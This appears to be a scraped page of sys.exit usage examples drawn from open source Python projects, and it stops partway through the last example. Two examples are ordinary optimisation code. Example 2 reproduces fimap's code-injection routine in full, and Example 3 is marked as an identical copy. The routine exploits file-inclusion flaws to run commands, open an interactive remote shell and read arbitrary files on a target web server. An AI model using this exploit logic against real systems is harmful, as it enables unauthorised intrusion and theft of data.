sys.exit

Here are examples of the Python API sys.exit, taken from open source projects.
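
For orientation, here is a minimal sketch of the basic calling conventions (not taken from any of the projects below): sys.exit() raises SystemExit, so an integer argument becomes the process exit status, a string argument is printed to sys.stderr with the status set to 1, and calling it with no argument (or None) exits with status 0.

import sys

def main():
    if len(sys.argv) < 2:
        # A string argument is written to stderr and the exit status becomes 1.
        sys.exit("usage: example.py <path>")
    try:
        open(sys.argv[1]).close()
    except IOError:
        # A non-zero integer reports failure to the calling shell.
        sys.exit(1)
    # sys.exit(0), sys.exit(None) or simply returning from main() all report success.
    sys.exit(0)

if __name__ == "__main__":
    main()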

200 Examples

Example 1

Project: HPOlib
Source File: wrapping.py
View license
def main():
    """Start an optimization of the HPOlib. For documentation see the
    comments inside this function and the general HPOlib documentation."""
    args, unknown_arguments = use_arg_parser()

    # Convert the path to the optimizer to be an absolute path, which is
    # necessary later when we change the working directory
    optimizer = args.optimizer
    if not os.path.isabs(optimizer):
        relative_path = optimizer
        optimizer = os.path.abspath(optimizer)
        logger.info("Converting relative optimizer path %s to absolute "
                    "optimizer path %s.", relative_path, optimizer)

    if args.working_dir:
        os.chdir(args.working_dir)

    experiment_dir = os.getcwd()
    check_before_start.check_first(experiment_dir)

    # Now we can safely import non standard things
    import numpy as np
    import HPOlib.Experiment as Experiment          # Wants numpy and scipy

    # Check how many optimizer versions are present and if all dependencies
    # are installed
    optimizer_version = check_before_start.check_optimizer(optimizer)

    logger.warning("You called -o %s, I am using optimizer defined in "
                   "%sDefault.cfg", optimizer, optimizer_version)
    optimizer = os.path.basename(optimizer_version)

    config = wrapping_util.get_configuration(experiment_dir,
                                             optimizer_version, unknown_arguments)

    # Saving the config file is done further down, as soon as we get
    # hold of the new optimizer directory
    wrapping_dir = os.path.dirname(os.path.realpath(__file__))

    # Load optimizer
    try:
        optimizer_dir = os.path.dirname(os.path.realpath(optimizer_version))
        optimizer_module = imp.load_source(optimizer_dir, optimizer_version + ".py")
    except (ImportError, IOError):
        logger.critical("Optimizer module %s not found", optimizer)
        import traceback
        logger.critical(traceback.format_exc())
        sys.exit(1)
    experiment_directory_prefix = config.get("HPOLIB", "experiment_directory_prefix")
    optimizer_call, optimizer_dir_in_experiment = optimizer_module.main(config=config,
                                                                        options=args,
                                                                        experiment_dir=experiment_dir,
                                                                        experiment_directory_prefix=experiment_directory_prefix)
    cmd = optimizer_call

    config.set("HPOLIB", "seed", str(args.seed))
    with open(os.path.join(optimizer_dir_in_experiment, "config.cfg"), "w") as f:
        config.set("HPOLIB", "is_not_original_config_file", "True")
        wrapping_util.save_config_to_file(f, config, write_nones=True)

    # initialize/reload pickle file
    if args.restore:
        try:
            os.remove(os.path.join(optimizer_dir_in_experiment, optimizer + ".pkl.lock"))
        except OSError:
            pass
    folds = config.getint('HPOLIB', 'number_cv_folds')
    trials = Experiment.Experiment(optimizer_dir_in_experiment,
                                   experiment_directory_prefix + optimizer,
                                   folds=folds,
                                   max_wallclock_time=config.get('HPOLIB',
                                                                 'cpu_limit'),
                                   title=args.title)
    trials.optimizer = optimizer_version

    if args.restore:
        #noinspection PyBroadException
        try:
            restored_runs = optimizer_module.restore(config=config,
                                                     optimizer_dir=optimizer_dir_in_experiment,
                                                     cmd=cmd)
        except:
            logger.critical("Could not restore runs for %s", args.restore)
            import traceback
            logger.critical(traceback.format_exc())
            sys.exit(1)

        logger.info("Restored %d runs", restored_runs)
        trials.remove_all_but_first_runs(restored_runs)
        fh = open(os.path.join(optimizer_dir_in_experiment, optimizer + ".out"), "a")
        fh.write("#" * 80 + "\n" + "Restart! Restored %d runs.\n" % restored_runs)
        fh.close()

        if len(trials.endtime) < len(trials.starttime):
            trials.endtime.append(trials.cv_endtime[-1])
        trials.starttime.append(time.time())
    else:
        trials.starttime.append(time.time())
    #noinspection PyProtectedMember
    trials._save_jobs()
    del trials
    sys.stdout.flush()

    # Run call
    if args.printcmd:
        logger.info(cmd)
        return 0
    else:
        # call target_function.setup()
        fn_setup = config.get("HPOLIB", "function_setup")
        if fn_setup:
            try:
                logger.info(fn_setup)
                fn_setup = shlex.split(fn_setup)
                output = subprocess.check_output(fn_setup, stderr=subprocess.STDOUT) #,
                                                 #shell=True, executable="/bin/bash")
                logger.debug(output)
            except subprocess.CalledProcessError as e:
                logger.critical(e.output)
                sys.exit(1)
            except OSError as e:
                logger.critical(e.message)
                logger.critical(e.filename)
                sys.exit(1)

        logger.info(cmd)
        output_file = os.path.join(optimizer_dir_in_experiment, optimizer + ".out")
        fh = open(output_file, "a")
        cmd = shlex.split(cmd)
        print cmd

        # Use a flag which is set to true as soon as all children are
        # supposed to be killed
        exit_ = Exit()
        signal.signal(signal.SIGTERM, exit_.signal_callback)
        signal.signal(signal.SIGABRT, exit_.signal_callback)
        signal.signal(signal.SIGINT, exit_.signal_callback)
        signal.signal(signal.SIGHUP, exit_.signal_callback)

        # Change into the current experiment directory
        # Some optimizer might expect this
        dir_before_exp = os.getcwd()
        os.chdir(optimizer_dir_in_experiment)
        # See man 7 credentials for the meaning of a process group id
        # This makes wrapping.py usable with SGE's default behaviour,
        # where qdel sends a SIGKILL to a whole process group
        logger.info(os.getpid())
        os.setpgid(os.getpid(), os.getpid())
        # TODO: figure out why shell=True was removed in commit f47ac4bb3ffe7f70b795d50c0828ca7e109d2879
        # maybe it has something to do with the previous behaviour where a
        # session id was set...
        proc = subprocess.Popen(cmd, stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE)

        global child_process_pid
        child_process_pid = proc.pid

        logger.info("-----------------------RUNNING----------------------------------")
        # http://stackoverflow.com/questions/375427/non-blocking-read-on-a-subprocess-pipe-in-python
        # How often is the experiment pickle supposed to be opened?
        if config.get("HPOLIB", "total_time_limit"):
            optimizer_end_time = time.time() + config.getint("HPOLIB", "total_time_limit")
        else:
            optimizer_end_time = sys.float_info.max

        console_output_delay = config.getfloat("HPOLIB", "console_output_delay")

        printed_start_configuration = list()
        printed_end_configuration = list()
        sent_SIGINT = False
        sent_SIGINT_time = np.inf
        sent_SIGTERM = False
        sent_SIGTERM_time = np.inf
        sent_SIGKILL = False
        sent_SIGKILL_time = np.inf


        def enqueue_output(out, queue):
            for line in iter(out.readline, b''):
                queue.put(line)
            out.close()

        stderr_queue = Queue()
        stdout_queue = Queue()
        stderr_thread = Thread(target=enqueue_output, args=(proc.stderr, stderr_queue))
        stdout_thread = Thread(target=enqueue_output, args=(proc.stdout, stdout_queue))
        stderr_thread.daemon = True
        stdout_thread.daemon = True
        stderr_thread.start()
        stdout_thread.start()
        if not (args.verbose or args.silent):
            lock = thread.allocate_lock()
            thread.start_new_thread(output_experiment_pickle,
                                    (console_output_delay,
                                     printed_start_configuration,
                                     printed_end_configuration,
                                     optimizer_dir_in_experiment,
                                     optimizer, experiment_directory_prefix,
                                     lock, Experiment, np, False))
            logger.info('Optimizer runs with PID: %d', proc.pid)

        while True:
            # this implements the total runtime limit
            if time.time() > optimizer_end_time and not sent_SIGINT:
                logger.info("Reached total_time_limit, going to shutdown.")
                exit_.true()

            # necessary, otherwise HPOlib-run takes 100% of one processor
            time.sleep(0.2)

            try:
                while True:
                    line = stdout_queue.get_nowait()
                    fh.write(line)

                    # Write to stdout only if verbose is on
                    if args.verbose:
                        sys.stdout.write(line)
                        sys.stdout.flush()
            except Empty:
                pass

            try:
                while True:
                    line = stderr_queue.get_nowait()
                    fh.write(line)

                    # Write always, except silent is on
                    if not args.silent:
                        sys.stderr.write("[ERR]:" + line)
                        sys.stderr.flush()
            except Empty:
                pass

            ret = proc.poll()

            running = get_all_p_for_pgid()
            if ret is not None and len(running) == 0:
                break
            # TODO: what happens if we have a ret but something is still
            # running?

            if exit_.get_exit() == True and not sent_SIGINT:
                logger.info("Sending SIGINT")
                kill_children(signal.SIGINT)
                sent_SIGINT_time = time.time()
                sent_SIGINT = True

            if exit_.get_exit() == True and not sent_SIGTERM and time.time() \
                    > sent_SIGINT_time + 100:
                logger.info("Sending SIGTERM")
                kill_children(signal.SIGTERM)
                sent_SIGTERM_time = time.time()
                sent_SIGTERM = True

            if exit_.get_exit() == True and not sent_SIGKILL and time.time() \
                    > sent_SIGTERM_time + 100:
                logger.info("Sending SIGKILL")
                kill_children(signal.SIGKILL)
                sent_SIGKILL_time = time.time()
                sent_SIGKILL = True

        ret = proc.returncode
        del proc

        if not (args.verbose or args.silent):
            output_experiment_pickle(console_output_delay,
                                     printed_start_configuration,
                                     printed_end_configuration,
                                     optimizer_dir_in_experiment,
                                     optimizer, experiment_directory_prefix,
                                     lock, Experiment, np, True)

        logger.info("-----------------------END--------------------------------------")
        fh.close()

        # Change back into to directory
        os.chdir(dir_before_exp)

        # call target_function.teardown()
        fn_teardown = config.get("HPOLIB", "function_teardown")
        if fn_teardown:
            try:
                fn_teardown = shlex.split(fn_teardown)
                output = subprocess.check_output(fn_teardown, stderr=subprocess.STDOUT) #,
                                                 #shell=True, executable="/bin/bash")
            except subprocess.CalledProcessError as e:
                logger.critical(e.output)
                sys.exit(1)
            except OSError as e:
                logger.critical(e.message)
                logger.critical(e.filename)
                sys.exit(1)

        trials = Experiment.Experiment(optimizer_dir_in_experiment,
                                       experiment_directory_prefix + optimizer)
        trials.endtime.append(time.time())
        #noinspection PyProtectedMember
        trials._save_jobs()
        # trials.finish_experiment()
        total_time = 0
        logger.info("Best result")
        logger.info(trials.get_best())
        logger.info("Durations")
        try:
            for starttime, endtime in zip(trials.starttime, trials.endtime):
                total_time += endtime - starttime
            logger.info("Needed a total of %f seconds", total_time)
            logger.info("The optimizer %s took %10.5f seconds",
                  optimizer, float(calculate_optimizer_time(trials)))
            logger.info("The overhead of HPOlib is %f seconds",
                  calculate_wrapping_overhead(trials))
            logger.info("The benchmark itself took %f seconds" % \
                  trials.total_wallclock_time)
        except Exception as e:
            logger.error(HPOlib.wrapping_util.format_traceback(sys.exc_info()))
            logger.error("Experiment itself went fine, but calculating "
                         "durations of optimization failed: %s %s",
                         sys.exc_info()[0], e)
        del trials
        logger.info("Finished with return code: " + str(ret))
        return ret
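
The recurring pattern in this example is to log a critical message plus the formatted traceback and then terminate with sys.exit(1), so the wrapper reports failure to whatever launched it. A stripped-down sketch of that pattern follows; the function name and the use of __import__ are illustrative stand-ins, not HPOlib's actual code.

import logging
import sys
import traceback

logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)

def load_optimizer_module(module_name):
    try:
        # Stand-in for the real loading step (the example above uses imp.load_source).
        return __import__(module_name)
    except ImportError:
        logger.critical("Optimizer module %s not found", module_name)
        logger.critical(traceback.format_exc())
        # Exit status 1 signals the failure to the calling process or scheduler.
        sys.exit(1)

if __name__ == "__main__":
    load_optimizer_module(sys.argv[1] if len(sys.argv) > 1 else "no_such_module")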

Example 2

Project: pwn_plug_sources
Source File: codeinjector.py
View license
    def start(self):
        domain = self.chooseDomains()
        vuln   = self.chooseVuln(domain.getAttribute("hostname"))

        hostname = domain.getAttribute("hostname")
        mode = vuln.getAttribute("mode")
        fpath = vuln.getAttribute("path")
        param = vuln.getAttribute("param")
        prefix = vuln.getAttribute("prefix")
        suffix = vuln.getAttribute("suffix")
        appendix = vuln.getAttribute("appendix")
        shcode = vuln.getAttribute("file")
        paramvalue = vuln.getAttribute("paramvalue")
        kernel = domain.getAttribute("kernel")
        postdata = vuln.getAttribute("postdata")
        ispost = vuln.getAttribute("ispost") == "1"
        language = vuln.getAttribute("language")
        isUnix = vuln.getAttribute("os") == "unix"
        
        if (not isUnix and shcode[1]==":"):
            shcode = shcode[3:]
        
        xml2config = self.config["XML2CONFIG"]
        langClass = xml2config.getAllLangSets()[language]
        
        plugman = self.config["PLUGINMANAGER"]
        
        if (kernel == ""): kernel = None
        payload = "%s%s%s" %(prefix, shcode, suffix)
        if (not ispost):
            path = fpath.replace("%s=%s" %(param, paramvalue), "%s=%s"%(param, payload))
        else:
            postdata = postdata.replace("%s=%s" %(param, paramvalue), "%s=%s"%(param, payload))
        php_inject_works = False
        sys_inject_works = False
        working_shell    = None

        url  = "http://%s%s" %(hostname, path)

        code = None

        if (mode.find("A") != -1 and mode.find("x") != -1):
            self._log("Testing %s-code injection thru User-Agent..."%(language), self.LOG_INFO)

        elif (mode.find("P") != -1 and mode.find("x") != -1):
            self._log("Testing %s-code injection thru POST..."%(language), self.LOG_INFO)

        elif (mode.find("L") != -1):
            if (mode.find("H") != -1):
                self._log("Testing %s-code injection thru Logfile HTTP-UA-Injection..."%(language), self.LOG_INFO)
            elif (mode.find("F") != -1):
                self._log("Testing %s-code injection thru Logfile FTP-Username-Injection..."%(language), self.LOG_INFO)

        elif (mode.find("R") != -1):
            if settings["dynamic_rfi"]["mode"] == "ftp":
                self._log("Testing code thru FTP->RFI...", self.LOG_INFO)
                if (not ispost):
                    url  = url.replace("%s=%s"%(param, shcode), "%s=%s"%(param, settings["dynamic_rfi"]["ftp"]["http_map"]))
                else:
                    postdata = postdata.replace("%s=%s"%(param, shcode), "%s=%s"%(param, settings["dynamic_rfi"]["ftp"]["http_map"]))
            elif settings["dynamic_rfi"]["mode"] == "local":
                self._log("Testing code thru LocalHTTP->RFI...", self.LOG_INFO)
                if (not ispost):
                    url  = url.replace("%s=%s"%(param, shcode), "%s=%s"%(param, settings["dynamic_rfi"]["local"]["http_map"]))
                else:
                    postdata = postdata.replace("%s=%s"%(param, shcode), "%s=%s"%(param, settings["dynamic_rfi"]["ftp"]["http_map"]))
            else:
                print "fimap is currently not configured to exploit RFI vulnerabilities."
                sys.exit(1)


        quiz, answer = langClass.generateQuiz()
        php_test_code = quiz
        php_test_result = answer

        code = self.__doHaxRequest(url, postdata, mode, php_test_code, langClass, suffix)
        if code == None:
            self._log("%s-code testing failed! code=None"%(language), self.LOG_ERROR)
            sys.exit(1)


        if (code.find(php_test_result) != -1):
            self._log("%s Injection works! Testing if execution works..."%(language), self.LOG_ALWAYS)
            php_inject_works = True
            shellquiz, shellanswer = xml2config.generateShellQuiz(isUnix)
            shell_test_code = shellquiz
            shell_test_result = shellanswer
            for item in langClass.getExecMethods():
                try:
                    name = item.getName()
                    payload = None
                    if (item.isUnix() and isUnix) or (item.isWindows() and not isUnix):
                        self._log("Testing execution thru '%s'..."%(name), self.LOG_INFO)
                        testload = item.generatePayload(shell_test_code)
                        if (mode.find("A") != -1):
                            self.setUserAgent(testload)
                            code = self.doPostRequest(url, postdata)
                        elif (mode.find("P") != -1):
                            if (postdata != ""):
                                testload = "%s&%s" %(postdata, testload)
                            code = self.doPostRequest(url, testload)
                        elif (mode.find("R") != -1):
                            code = self.executeRFI(url, postdata, suffix, testload)
                        elif (mode.find("L") != -1):
                            testload = self.convertUserloadToLogInjection(testload)
                            testload = "data=" + base64.b64encode(testload)
                            if (postdata != ""):
                                testload = "%s&%s" %(postdata, testload)
                            code = self.doPostRequest(url, testload)
                        if code != None and code.find(shell_test_result) != -1:
                            sys_inject_works = True
                            working_shell = item
                            self._log("Execution thru '%s' works!"%(name), self.LOG_ALWAYS)
                            if (kernel == None):
                                self._log("Requesting kernel version...", self.LOG_DEBUG)
                                uname_cmd = item.generatePayload(xml2config.getKernelCode(isUnix))
                                kernel = self.__doHaxRequest(url, postdata, mode, uname_cmd, langClass, suffix).strip()
                                self._log("Kernel received: %s" %(kernel), self.LOG_DEBUG)
                                domain.setAttribute("kernel", kernel)
                                self.saveXML()
    
                            break
                    else:
                        self._log("Skipping execution method '%s'..."%(name), self.LOG_DEBUG)
                         
                except KeyboardInterrupt:
                    self._log("Aborted by user.", self.LOG_WARN)
                    
            attack = None
            while (attack != "q"):
                attack = self.chooseAttackMode(language, php_inject_works, sys_inject_works, isUnix)
                

                if (type(attack) == str):
                    if (attack == "fimap_shell"):
                        cmd = ""
                        print "Please wait - Setting up shell (one request)..."
                        #pwd_cmd = item.generatePayload("pwd;whoami")
                        commands = (xml2config.getCurrentDirCode(isUnix), xml2config.getCurrentUserCode(isUnix))
                        pwd_cmd = item.generatePayload(xml2config.concatCommands(commands, isUnix))
                        tmp = self.__doHaxRequest(url, postdata, mode, pwd_cmd, langClass, suffix).strip()
                        curdir = tmp.split("\n")[0].strip()
                        curusr = tmp.split("\n")[1].strip()
                        
                        if (curusr) == "":
                            curusr = "fimap"
                        
                        print shell_banner

                        while 1==1:
                            cmd = raw_input("[email protected]%s:%s$> " %(curusr,curdir))
                            if cmd == "q" or cmd == "quit": break
                            
                            try:
                                if (cmd.strip() != ""):
                                    commands = (xml2config.generateChangeDirectoryCommand(curdir, isUnix), cmd)
                                    cmds = xml2config.concatCommands(commands, isUnix)
                                    userload = item.generatePayload(cmds)
                                    code = self.__doHaxRequest(url, postdata, mode, userload, langClass, suffix)
                                    if (cmd.startswith("cd ")):
                                        commands = (xml2config.generateChangeDirectoryCommand(curdir, isUnix), cmd, xml2config.getCurrentDirCode(isUnix))
                                        cmds = xml2config.concatCommands(commands, isUnix)
                                        cmd = item.generatePayload(cmds)
                                        curdir = self.__doHaxRequest(url, postdata, mode, cmd, langClass, suffix).strip()
                                    print code.strip()
                            except KeyboardInterrupt:
                                print "\nCancelled by user."
                        print "See ya dude!"
                        print "Do not forget to close this security hole."
                    else:
                        haxhelper = HaxHelper(self, url, postdata, mode, langClass, suffix, isUnix, sys_inject_works, item)
                        plugman.broadcast_callback(attack, haxhelper)
                        #ASDF
                else:
                    cpayload = attack.generatePayload()

                    shellcode = None

                    if (not attack.doInShell()):
                        shellcode = cpayload
                    else:
                        shellcode = item.generatePayload(cpayload)


                    code = self.__doHaxRequest(url, postdata, mode, shellcode, langClass, appendix)
                    if (code == None):
                        print "Exploiting Failed!"
                        sys.exit(1)
                    print code.strip()
        elif (code.find(php_test_code) != -1):
            
            try:
                self._log("Injection not possible! It looks like a file disclosure bug.", self.LOG_WARN)
                self._log("fimap can currently not readout files comfortably.", self.LOG_WARN)
                go = raw_input("Do you still want to readout files (even without filtering them)? [Y/n] ")
                if (go == "Y" or go == "y" or go == ""):
                    while 1==1:
                        inp = raw_input("Absolute filepath you want to read out: ")
                        if (inp == "q"):
                            print "Fix this hole! Bye."
                            sys.exit(0)
                        payload = "%s%s%s" %(prefix, inp, suffix)
                        if (not ispost):
                            path = fpath.replace("%s=%s" %(param, paramvalue), "%s=%s"%(param, payload))
                        else:
                            postdata = postdata.replace("%s=%s" %(param, paramvalue), "%s=%s"%(param, payload))
                        url = "http://%s%s" %(hostname, path)
                        code = self.__doHaxRequest(url, postdata, mode, "", langClass, appendix, False)
                        print "--- Unfiltered output starts here ---"
                        print code
                        print "--- EOF ---"
                else:
                    print "Cancelled. If you want to read out files by hand use this URL:"
                    
                    if (not ispost):
                        path = fpath.replace("%s=%s" %(param, paramvalue), "%s=%s"%(param, "ABSOLUTE_FILE_GOES_HERE"))
                        url = "http://%s%s" %(hostname, path)
                        print "URL: " + url
                    else:
                        postdata = postdata.replace("%s=%s" %(param, paramvalue), "%s=%s"%(param, "ABSOLUTE_FILE_GOES_HERE"))
                        url = "http://%s%s" %(hostname, path)
                        print "URL          : " + url
                        print "With Postdata: " + postdata
            except KeyboardInterrupt:
                raise

        else:
            print "Failed to test injection. :("

Example 3

Project: raspberry_pwn
Source File: codeinjector.py
View license
The code is identical to Example 2: this project bundles the same fimap codeinjector.py, so its start() method is a line-for-line copy of the listing above and is not repeated here.

Example 4

Project: pyomo
Source File: lagrangeParam.py
View license
def run(args=None):
###################################

   print("RUNNING - run args=%s" % str(args))

   import pyomo.environ

   def LagrangeParametric(args=None):
      class Object(object): pass
      Result = Object()
      Result.status = 'LagrangeParam begins '+ datetime_string() + '...running new ph'
      ph = None

      blanks = "                          "  # used for formatting print statements
# options used
      betaMin       = options.beta_min
      betaMax       = options.beta_max
      betaTol       = options.beta_tol
      gapTol        = options.Lagrange_gap
      minProb       = options.min_prob
      maxIntervals  = options.max_intervals
      maxTime       = options.max_time
      IndVarName    = options.indicator_var_name
      multName      = options.lambda_parm_name
      CCStageNum    = options.stage_num
      csvPrefix     = options.csvPrefix
      verbosity     = options.verbosity
      verbosity = 2 # override for debug (= 3 to get super-debug)
      HGdebug = 0   # special debug (not public)
# local...may become option
      optTol = gapTol
####################################################################
      STARTTIME = time.time()

      Result.status = "options set"
      if verbosity > 1:
        print("From LagrangeParametric, status = %s\tSTARTTIME = %s" \
                % (str(getattr(Result,'status')), str(STARTTIME)))

      ph = PHFromScratch(options)
      Result.ph = ph
      rootnode = ph._scenario_tree._stages[0]._tree_nodes[0]   # use rootnode to loop over scenarios
      ReferenceInstance = ph._instances[rootnode._scenarios[0]._name]  # arbitrary scenario

      if find_active_objective(ph._scenario_tree._scenarios[0]._instance,safety_checks=True).is_minimizing():
         sense = 'min'
      else:
         sense = 'max'

      scenario_count = len(full_scenario_tree._stages[-1]._tree_nodes)
      if options.verbosity > 0: print("%s %s scenarios" % (str(sense),str(scenario_count)))

# initialize
      Result.status = 'starting at '+datetime_string()
      if verbosity > 0:
         print(Result.status)
      ScenarioList = []
      lambdaval = 0.
      lagrUtil.Set_ParmValue(ph, multName,lambdaval)

      # IMPORTANT: Preprocess the scenario instances
      #            before fixing variables, otherwise they
      #            will be preprocessed out of the expressions
      #            and the output_fixed_variable_bounds option
      #            will have no effect when we update the
      #            fixed variable values (and then assume we
      #            do not need to preprocess again because
      #            of this option).
      ph._preprocess_scenario_instances()

      sumprob = 0.
      minprob = 1.
      maxprob = 0.
      # fixed = 0 to get PR point at b=0
      lagrUtil.FixAllIndicatorVariables(ph, IndVarName, 0)
      for scenario in rootnode._scenarios:
         instance = ph._instances[scenario._name]
         sname = scenario._name
         sprob = scenario._probability
         sumprob = sumprob + sprob
         minprob = min(minprob,sprob)
         maxprob = max(maxprob,sprob)
         ScenarioList.append([sname,sprob])

      ScenarioList.sort(key=operator.itemgetter(1))   # sorts from min to max probability
      if verbosity > 0:
         print("probabilities sum to %f range: %f to %f" % (sumprob,minprob,maxprob))
      Result.ScenarioList = ScenarioList

# Write ScenarioList = name, probability in csv file sorted by probability
      outName = csvPrefix + 'ScenarioList.csv'
      print("writing to %s" % outName)
      with open(outName,'w') as outFile:
         for scenario in ScenarioList:
            outFile.write(scenario[0]+", "+str(scenario[1])+'\n')
      Result.ScenarioList = ScenarioList

      addstatus = 'Scenario List written to ' + csvPrefix+'ScenarioList.csv'
      Result.status = Result.status + '\n' + addstatus
      if verbosity > 0:
         print(addstatus)

      if verbosity > 0:
         print("solve begins %s" % datetime_string())
         print("\t- lambda = %f" % lambdaval)
      SolStat, zL = lagrUtil.solve_ph_code(ph, options)
      if verbosity > 0:
         print("solve ends %s" % datetime_string())
         print("\t- status = %s" % str(SolStat))
         print("\t- zL = %s" % str(zL))

      bL = Compute_ExpectationforVariable(ph, IndVarName, CCStageNum)
      if bL > 0:
         print("** bL = %s > 0 (all %s = 0)" % (str(bL), str(IndVarName)))
         return Result

      if verbosity > 0:  print("Initial optimal obj = %s for bL = %s" % (str(zL), str(bL)))

      # fixed = 1 to get PR point at b=1
      lagrUtil.FixAllIndicatorVariables(ph, IndVarName, 1)

      if verbosity > 0:
        print("solve begins %s" % datetime_string())
        print("\t- lambda = %s" % str(lambdaval))
      SolStat, zU = lagrUtil.solve_ph_code(ph, options)
      if verbosity > 0:
        print("solve ends %s" % datetime_string())
        print("\t- status = %s" % str(SolStat))
        print("\t- zU = %s" % str(zU))
      if not SolStat[0:2] == 'ok':
         print(str(SolStat[0:3])+" is not 'ok'")
         addstatus = "** Solution is non-optimal...aborting"
         print(addstatus)
         Result.status = Result.status + "\n" + addstatus
         return Result

      bU = Compute_ExpectationforVariable(ph, IndVarName, CCStageNum)
      if bU < 1.- betaTol and verbosity > 0:
         print("** Warning:  bU = %s  < 1" % str(bU))

### enumerate points in PR space (all but one scenario)
#      Result.lbz = [ [0,bL,zL], [None,bU,zU] ]
#      for scenario in rootnode._scenarios:
#         sname = scenario._name
#         instance = ph._instances[sname]
#         print "excluding scenario",sname
#         getattr(instance,IndVarName).value = 0
#         print sname,"value =",getattr(instance,IndVarName).value,getattr(instance,IndVarName).fixed
#         SolStat, z = lagrUtil.solve_ph_code(ph, options)
#         b = Compute_ExpectationforVariable(ph, IndVarName, CCStageNum)
#         print "solve ends with status =",SolStat,"(b, z) =",b,z
#         getattr(instance,IndVarName).value = 1
#         Result.lbz.append([None,b,z])
#         for t in instance.TimePeriods:
#           print "Global at",t,"=",instance.posGlobalLoadGenerateMismatch[t].value, \
#                '-',instance.negGlobalLoadGenerateMismatch[t].value,"=",\
#                    instance.GlobalLoadGenerateMismatch[t].value,\
#               "\tDemand =",instance.TotalDemand[t].value, ",",\
#                "Reserve =",instance.ReserveRequirement[t].value
#
#      PrintPRpoints(Result.lbz)
#      return Result
#### end enumeration
########################################################################

      if verbosity > 1:
         print("We have bU = %s ...about to free all %s for %d scenarios" % \
                (str(bU), str(IndVarName), len(ScenarioList)))

      # free scenario selection variable
      lagrUtil.FreeAllIndicatorVariables(ph, IndVarName)

      if verbosity > 1:
         print("\tall %s freed; elapsed time = %f" % (str(IndVarName), time.time() - STARTTIME))

# initialize with the two endpoints
      Result.lbz = [ [0.,bL,zL], [None,bU,zU] ]
      Result.selections = [[], ScenarioList]
      NumIntervals = 1
      if verbosity > 0:
         print("Initial relative Lagrangian gap = %f maxIntervals = %d" % (1-zL/zU, maxIntervals))
         if verbosity > 1:
            print("entering while loop %s" % datetime_string())
         print("\n")

############ main loop to search intervals #############
########################################################
      while NumIntervals < maxIntervals:
         lapsedTime = time.time() - STARTTIME
         if lapsedTime > maxTime:
            addstatus = '** max time reached ' + str(lapsedTime)
            print(addstatus)
            Result.status = Result.status + '\n' + addstatus
            break
         if verbosity > 1:
            print("Top of while with %d intervals elapsed time = %f" % (NumIntervals, lapsedTime))
            PrintPRpoints(Result.lbz)

         lambdaval = None
### loop over PR points to find first unfathomed interval to search ###
         for PRpoint in range(1,len(Result.lbz)):
            if Result.lbz[PRpoint][0] == None:
# multiplier = None means interval with upper endpoint at PRpoint not fathomed
               bL = Result.lbz[PRpoint-1][1]
               zL = Result.lbz[PRpoint-1][2]
               bU = Result.lbz[PRpoint][1]
               zU = Result.lbz[PRpoint][2]
               lambdaval = (zU - zL) / (bU - bL)
               break

#############################
# Exited from the for loop
         if verbosity > 1:
            print("exited for loop with PRpoint = %s ...lambdaval = %s" % (PRpoint, lambdaval))
         if lambdaval == None: break # all intervals are fathomed

         if verbosity > 1: PrintPRpoints(Result.lbz)
         if verbosity > 0:
            print("Searching for b in [%s, %s] with %s = %f" % (str(round(bL,4)), str(round(bU,4)), multName, lambdaval))

# search interval (bL,bU)
         lagrUtil.Set_ParmValue(ph, multName,lambdaval)
         if verbosity > 0:
            print("solve begins %s" % datetime_string())
            print("\t- %s = %f" % (multName, lambdaval))

         #########################################################
         SolStat, Lagrangian = lagrUtil.solve_ph_code(ph, options)
         #########################################################
         if not SolStat[0:2] == 'ok':
            addstatus = "** Solution status " + SolStat + " is not optimal"
            print(addstatus)
            Result.status = Result.status + "\n" + addstatus
            return Result

         b = Compute_ExpectationforVariable(ph, IndVarName, CCStageNum)
         z = Lagrangian + lambdaval*b
         if verbosity > 0:
            print("solve ends %s" % datetime_string())
            print("\t- Lagrangian = %f" % Lagrangian)
            print("\t- b = %s" % str(b))
            print("\t- z = %s" % str(z))
            print("\n")

# We have PR point (b,z), which may be new or one of the endpoints
##################################################################

######### Begin tolerance tests ##########
# Test that b is in [bL,bU]
         if verbosity > 1: print("\ttesting b")
         if b < bL - betaTol or b > bU + betaTol:
            addstatus = "** fatal error: probability (= " + str(b) + \
                ") is outside interval, (" + str(bL) + ", " + str(bU) + ")"
            addstatus = addstatus + "\n\t(tolerance = " + str(betaTol) + ")"
            print(addstatus+'\n')
            Result.status = Result.status + addstatus
            return Result
# Test that z is in [zL,zU]
         if verbosity > 1: print("\ttesting z")
# using optTol as absolute tolerance (not relative)
#   ...if we reconsider, need to allow negative z-values
         if z < zL - optTol or z > zU + optTol:
            addstatus = "** fatal error: obj (= " + str(z) + \
                ") is outside interval, (" + str(zL) + ", " + str(zU) + ")"
            print(addstatus+'\n')
            Result.status = Result.status + addstatus
            return Result

# Ok, we have (b,z) in [(bL,zL), (bU,zU)], at least within tolerances

         oldLagrangian = zL - lambdaval*bL
# ensure lambdaval set such that endpoints have same Lagrangian value
# (this is probably unnecessary, but check anyway)
         if abs(oldLagrangian - (zU - lambdaval*bU)) > optTol*abs(oldLagrangian):
            addstatus = "** fatal error: Lagrangian at (bL,zL) = " + \
                str(oldLagrangian) + " not= " + str(zU-lambdaval*bU) + \
                "\n\t(optTol = " + str(optTol) + ")"
            Result.status = Result.status + addstatus
            return Result

# no more fatal error tests...need to know if (b,z) is endpoint or new

         if verbosity > 1: print("No anomalies...testing if b = bL or bU")

# Test if endpoint is an alternative optimum of Lagrangian
# ...using optTol as *relative* tolerance
# (could use other reference values -- eg, avg or max of old and new Lagrangian values)
         refValue =  max( min( abs(oldLagrangian), abs(Lagrangian) ), 1.)
         alternativeOpt = abs( oldLagrangian - Lagrangian ) <= optTol*refValue

# alternativeOpt = True means we computed point (b,z) is alternative optimum such that:
#   case 1: (b,z) = endpoint, in which case we simply fathom [bL,bU] by setting PRpoint
#            to [lambdaval,bU,zU] (the numeric value of multiplier means fathomed)
#   case 2: (b,z) is new PR point on line segment, in which case we split into
#           [bL,b] and [b,bU], with both fathomed

         if verbosity > 1:
            print("oldLagrangian = %s" % str(oldLagrangian))
            if alternativeOpt: print(":= Lagrangian = %s" % str(Lagrangian ))
            else: print("> Lagrangian = %s" % str(Lagrangian))

         if alternativeOpt:
# setting multiplier of (bU,zU) to a numeric fathoms the interval [bL,bU]
            Result.lbz[PRpoint][0] = lambdaval

# test if (b,z) is an endpoint
         newPRpoint = abs(b-bL) > betaTol and abs(b-bU) > betaTol
         if not newPRpoint:
